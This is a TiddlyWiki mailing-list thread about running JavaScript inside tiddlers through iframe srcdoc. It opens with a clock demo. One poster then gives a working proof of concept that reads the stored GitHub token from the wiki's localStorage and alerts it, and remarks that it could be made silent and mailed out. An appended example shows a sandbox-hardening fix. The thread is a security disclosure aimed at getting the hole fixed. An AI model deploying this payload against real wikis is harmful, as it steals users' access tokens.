cj.v.., I don't have much experience with JS macros in TW, but I can imagine it would be the same, especially if there is no sanitisation whatsoever. As to eliminating iframes, normally there is no way to break out of one. However, in the case of my Proof-of-Concept with TW, the localStorage is global, and can be accessed by ANY SITE. This is just one more reason I believe TW should use browser cookies: they are not accessible from inside an iframe, and have more options for security and access.
On Monday, August 16, 2021 at 11:51:35 AM UTC-4 cj.v...@gmail.com wrote:
> It kind of sounds like the iFrame element should then be outright eliminated from the web entirely.
>
> That might be problematic.
>
> Re security, couldn't any tiddler that is a javascript macro be altered for nefarious purposes just as easily as injecting malicious javascript into an iFrame?
>
> On Monday, August 16, 2021 at 12:39:41 PM UTC-3 flanc...@gmail.com wrote:
>
>> This seems EXTREMELY INSECURE. What is to stop an attacker from injecting malicious JS into a tiddler, regardless of whether it is "sandboxed"? Paste this Proof-of-Concept into a blank tiddler. What it does is steal your GitHub PAT if you have it configured, and alert it to you. While I have not done it here, I could easily make it both invisible and have it email me the PATs it gathers.
>>
>> CODE:
>> <$vars vSrcDoc={{{ [[<body> <div id="clockDiv"></div><script>document.getElementById('clockDiv').innerHTML = `<a id="xss" href="javascript:alert('Your GitHub Token is:'+localStorage.getItem('tw5-password-github')+'. If it is blank, you probably don\\'t have TW GitHub saving configured');"></a>`; document.getElementById('xss').click();</script></body>]] }}}>
>> <iframe srcdoc=<<vSrcDoc>> style="border:none;width:100%;"></iframe>
>> </$vars>
>>
>> Long-story-short, an attacker can easily bypass any sanitation TW employs, and harvest credentials from various sites. It is my belief that this issue needs to be fixed immediately, and brought to the attention of Jeremy and other devs.
>>
>> I would be happy to help on the repair process. I have some experience with PenTesting and fixing XSS vulnerabilities (mainly in my own applications). I would recommend adding a listener to TW changes, and checking for iframe code. If it does contain this, TW should add a sandbox constraint on it ( https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#attr-sandbox )
>>
>> On Monday, August 16, 2021 at 10:55:46 AM UTC-4 cj.v...@gmail.com wrote:
>>
>>> Updated one of the tiddlers in the JSON package. New version attached.
>>>
>>> The addition highlighted below:
>>>
>>> <body>
>>> <div id="clockDiv"></div>
>>> <script>
>>> *document.oncontextmenu = function() { *
>>> * return false; *
>>> *};*
>>> let clockEl = document.getElementById("clockDiv");
>>> ...
>>>
>>> The reason for the added code: block access to the back button in the iFrame (by blocking access to the entire menu), which winds up performing the back button operation on the entire browser page.
>>>
>>> On Sunday, August 15, 2021 at 11:27:41 PM UTC-3 Charlie Veniot wrote:
>>>
>>>> I don't know what made me think of this.
>>>>
>>>> In case this has not been brought up in a while (I doubt this is new to seasoned folk) ...
>>>>
>>>> I was thinking: could I use an iFrame to include simple javascript in a tiddler without getting into macros or plugins that enable javascript?
>>>>
>>>> And, if I could, then could I set things up so that the iFrame is showing javascript dynamically created by the tiddler?
>>>>
>>>> So here is a way to show a digital clock in TiddlyWiki, for non-programmers who just want to copy and paste javascript code from the web without figuring out how the javascript code works:
>>>>
>>>> Put this in a brand new tiddler:
>>>>
>>>> <$vars vSrcDoc={{{ [[<body> <div id="clockDiv"></div> <script>
>>>> let clockEl = document.getElementById("clockDiv");
>>>> function getClockTime() {
>>>>   let date = new Date();
>>>>   let hr = date.getHours();
>>>>   let min = date.getMinutes();
>>>>   let sec = date.getSeconds();
>>>>   hr = ("0" + hr).slice(-2);
>>>>   min = ("0" + min).slice(-2);
>>>>   sec = ("0" + sec).slice(-2);
>>>>   clockEl.innerHTML = `${hr}:${min}:${sec}`;
>>>> }
>>>> setInterval(getClockTime, 1000);
>>>> </script></body>]] }}}>
>>>> <iframe srcdoc=<<vSrcDoc>> style="border:none;width:100%;"></iframe>
>>>> </$vars>
>>>>
>>>> Sneaky sneaky, has me wondering what kind of other fun things could be done...
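An added example, not code from this thread or from TiddlyWiki: the hardening step proposed above (a listener on wiki changes that puts a `sandbox` constraint on every rendered iframe), in browser JavaScript. The Proof-of-Concept works because a `srcdoc` iframe with no `sandbox` attribute runs in the embedding page's origin, so its script can read the parent's localStorage; a `sandbox` attribute that omits `allow-same-origin` gives the frame an opaque origin instead, and the localStorage read throws. The function names are hypothetical; the sandbox tokens are the ones documented on the MDN page linked in the thread.

```javascript
// Added example, not from the thread. Tokens are from the MDN sandbox page linked
// in the thread; the function names are hypothetical.

// Tokens that must never survive on a user-authored iframe.
const FORBIDDEN_TOKENS = new Set([
  'allow-same-origin',                       // restores the parent's origin (and its localStorage)
  'allow-top-navigation',                    // lets the frame navigate the whole wiki page
  'allow-top-navigation-by-user-activation',
]);

// Compute the sandbox value a frame should carry. `existing` is the current
// attribute value (null when absent); `fallback` is used when none is set.
// An empty string is the strictest sandbox; 'allow-scripts' keeps the clock
// demo working while still denying access to the parent's localStorage.
function hardenSandbox(existing, fallback = '') {
  if (existing === null || existing === undefined) return fallback;
  const kept = existing.split(/\s+/).filter(t => t !== '' && !FORBIDDEN_TOKENS.has(t));
  return kept.join(' ');
}

// Apply the policy to one element (anything with getAttribute/setAttribute).
function hardenIframe(el, fallback = '') {
  const value = hardenSandbox(el.getAttribute('sandbox'), fallback);
  el.setAttribute('sandbox', value);
  return value;
}

// Browser-only: harden iframes already under `root` and any added later, i.e.
// the "listener on TW changes" suggested in the thread. Caveat: a sandbox value
// set after the frame's document has loaded does not affect that document, so
// the check has to run before the frame navigates (or the frame must be reloaded).
function watchForIframes(root, fallback = '') {
  const scan = node => {
    if (node.nodeType !== 1) return;          // elements only
    if (node.tagName === 'IFRAME') hardenIframe(node, fallback);
    node.querySelectorAll('iframe').forEach(f => hardenIframe(f, fallback));
  };
  scan(root);
  const observer = new MutationObserver(records =>
    records.forEach(r => r.addedNodes.forEach(scan)));
  observer.observe(root, { childList: true, subtree: true });
  return observer;
}

if (typeof document !== 'undefined' && typeof MutationObserver !== 'undefined') {
  watchForIframes(document.body);
}
```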